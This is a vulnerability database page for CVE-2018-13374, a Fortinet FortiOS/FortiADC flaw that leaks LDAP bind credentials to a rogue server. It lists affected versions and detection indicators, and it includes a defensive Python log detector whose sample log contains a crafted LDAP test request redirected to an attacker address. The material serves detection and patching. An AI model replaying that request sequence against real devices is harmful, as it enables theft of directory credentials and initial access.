cbcvebase.
CVE-2018-13374
published 2019-01-22


Priority: P1 (81)
Severity: medium, CVSS 3.1 base score 4.3
Vector: AV:N / AC:L / PR:L / UI:N / S:U / C:L / I:N / A:N
Flags: KEV · ITW · EXPLOIT · Ransomware
CISA Known Exploited Vulnerability, remediation due 2022-09-29
Exploited in the wild
EPSS: 38.09% (98.4th percentile)
An improper access control vulnerability in Fortinet FortiOS 6.0.2, 5.6.7 and earlier, and FortiADC 6.1.0, 6.0.0 to 6.0.1 and 5.4.0 to 5.4.4 allows an authenticated attacker to obtain the LDAP server login credentials configured on a FortiGate by pointing an LDAP server connectivity test request at a rogue LDAP server instead of the configured one.

Affected

8 ranges

Vendor    Product    Version range        Fixed in
fortinet  fortiadc   -                    -
fortinet  fortiadc   -                    -
fortinet  fortiadc   >= 5.4.0, < 5.4.5    5.4.5
fortinet  fortiadc   >= 6.0.0, < 6.0.2    6.0.2
fortinet  fortigate  -                    -
fortinet  fortinet   -                    -
fortinet  fortios    < 6.0.3              6.0.3
fortinet  fortios    -                    -

Detection & IOCs (extracted from sources)

URL: /logincheck
URL: /p/user/ldap/json/
URL: /api/ldap?json=
  • Monitor for GET requests to the FortiGate endpoint /p/user/ldap/json/ — this path is used by the exploit to enumerate the existing LDAP server configuration (name, username, port, DN, CA cert) prior to triggering the credential theft.
  • Monitor for GET requests to /api/ldap?json= containing a modified 'server' field pointing to an attacker-controlled IP (i.e., the 'server' value differs from the configured LDAP server) and 'secure':0 — this is the direct exploitation step that redirects the LDAP bind to a rogue server.
  • Detect outbound LDAP connections (TCP, typically port 389) from the FortiGate management IP to unexpected external hosts: the exploit sets up a rogue LDAP listener on the attacker's IP, and the FortiGate sends the configured bind credentials to whatever host the test request names; with a plain (non-TLS) bind those credentials travel in cleartext.
  • CVE-2018-13374 was observed as an initial access vector in Conti ransomware attack chains alongside CVE-2018-13379; correlate FortiGate exploitation attempts with subsequent BazarLoader activity or lateral movement indicators.
  • The exploit requires a valid (even read-only) FortiGate web UI login session before triggering the vulnerability; alert on successful logins to /logincheck from unusual source IPs followed immediately by requests to /p/user/ldap/json/ and /api/ldap.
  • The exploit sets 'secure':0 in the crafted LDAP request, forcing an unencrypted (plain LDAP) bind. Enforcing LDAPS or STARTTLS on all LDAP server objects reduces the risk of credential interception in transit, but only if the FortiGate validates the server certificate against the configured CA, since the attacker still chooses the destination host; the improper access control flaw itself (the ability to redirect the test to an arbitrary server) is present in all affected versions regardless of the transport setting.
  • Affected versions span a wide range: FortiOS 6.0.2, 5.6.7 and below; FortiADC 6.1.0, 6.0.0–6.0.1, 5.4.0–5.4.4. Ensure patching covers all product lines, not just FortiOS/FortiGate.
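The bullets above describe a request sequence (successful /logincheck, enumeration of the LDAP config via /p/user/ldap/json/, then an /api/ldap test whose 'server' differs from the configured one with 'secure':0). The Python below is added here as a worked example and is not code from the page, from Fortinet, or from any published exploit. It assumes a simplified, constructed access-log line format, a constructed list of configured LDAP server objects and admin networks, and a JSON parameter shape built only from the field names the bullets mention ('server', 'secure', name, port, username); the real FortiGate log layout and API schema differ and must be adapted before use.

```python
import json
import re
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from urllib.parse import parse_qs, quote, urlsplit

# Assumed environment (constructed): LDAP server objects configured on the
# FortiGate, keyed by object name, and networks where admin logins are expected.
CONFIGURED_LDAP = {"corp-ldap": "10.0.0.20"}
ADMIN_NETS = [ip_network("10.0.0.0/8")]
WINDOW = timedelta(minutes=5)  # correlate requests this long after /logincheck

# Assumed, simplified access-log format:
# <ISO-8601 UTC timestamp> <client ip> <user> <method> <path+query> <status>
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<user>\S+) (?P<method>[A-Z]+) "
                    r"(?P<path>\S+) (?P<status>\d{3})$")

def _ldap_test(name, server, port, secure):
    """Percent-encoded json= value of a connectivity test. Field names follow
    the page ('server', 'secure', ...); the exact schema is an assumption."""
    body = {"name": name, "server": server, "port": port, "secure": secure,
            "username": "cn=svc,dc=corp,dc=example"}
    return quote(json.dumps(body, separators=(",", ":")), safe="")

# Constructed sample log: a normal admin test from the management LAN, a failed
# login whose follow-up must be ignored, and the exploit sequence from outside.
SAMPLE_LOG = [
    "2022-09-01T10:00:01Z 10.0.0.5 admin POST /logincheck 200",
    "2022-09-01T10:00:09Z 10.0.0.5 admin GET /api/ldap?json="
    + _ldap_test("corp-ldap", "10.0.0.20", 636, 1) + " 200",
    "2022-09-01T10:05:00Z 198.51.100.9 admin POST /logincheck 401",
    "2022-09-01T10:05:02Z 198.51.100.9 admin GET /p/user/ldap/json/ 403",
    "2022-09-01T10:12:00Z 203.0.113.7 readonly POST /logincheck 200",
    "2022-09-01T10:12:03Z 203.0.113.7 readonly GET /p/user/ldap/json/ 200",
    "2022-09-01T10:12:06Z 203.0.113.7 readonly GET /api/ldap?json="
    + _ldap_test("corp-ldap", "203.0.113.7", 389, 0) + " 200",
]

def parse_line(line):
    """Parse one log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    ev["status"] = int(ev["status"])
    url = urlsplit(ev["path"])
    ev["route"], ev["query"] = url.path, parse_qs(url.query)  # parse_qs decodes %xx
    return ev

def _alert(severity, ev, reason):
    return {"severity": severity, "src": ev["src"], "user": ev["user"],
            "ts": ev["ts"].isoformat(), "reason": reason}

def detect(lines):
    """Return alerts, in log order, for the CVE-2018-13374 request pattern."""
    alerts, sessions = [], {}  # sessions: client ip -> latest successful login
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        src = ev["src"]
        if ev["route"] == "/logincheck":
            if ev["status"] == 200:
                sessions[src] = {"login": ev["ts"], "enumerated": False,
                                 "unusual": not any(ip_address(src) in n for n in ADMIN_NETS)}
            continue
        sess = sessions.get(src)
        if sess is None or ev["ts"] - sess["login"] > WINDOW:
            continue  # only requests that follow a successful login count
        if ev["route"] == "/p/user/ldap/json/" and ev["status"] == 200:
            sess["enumerated"] = True
            if sess["unusual"]:
                alerts.append(_alert("medium", ev, "LDAP config enumerated after login from non-admin network"))
            continue
        if ev["route"] != "/api/ldap" or "json" not in ev["query"]:
            continue
        try:
            params = json.loads(ev["query"]["json"][0])
        except ValueError:
            continue
        configured = CONFIGURED_LDAP.get(params.get("name"))
        mismatch = configured is not None and params.get("server") != configured
        reasons = []
        if mismatch:
            reasons.append("test server %r differs from configured %r" % (params.get("server"), configured))
        if params.get("secure") == 0:
            reasons.append("secure=0 forces a plaintext bind")
        if sess["enumerated"]:
            reasons.append("preceded by config enumeration")
        if mismatch:
            alerts.append(_alert("high", ev, "; ".join(reasons)))
        elif reasons:
            alerts.append(_alert("low", ev, "; ".join(reasons)))
    return alerts

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a)
```

Run as a script, it prints one medium alert (enumeration from a non-admin address) and one high alert (test redirected to 203.0.113.7 with secure=0) for the constructed sample, and nothing for the admin's legitimate test. The network-side complement to the third bullet is a flow-log filter for TCP connections from the FortiGate management address to port 389 or 636 on any host not listed in CONFIGURED_LDAP.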

CVSS provenance

Source     Version  Score  Severity  Vector
nvd        3.1      4.3    MEDIUM    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
nvd        2.0      4.0    MEDIUM    AV:N/AC:L/Au:S/C:P/I:N/A:N
vulncheck  -        4.3    MEDIUM    -
cisa       -        4.3    MEDIUM    -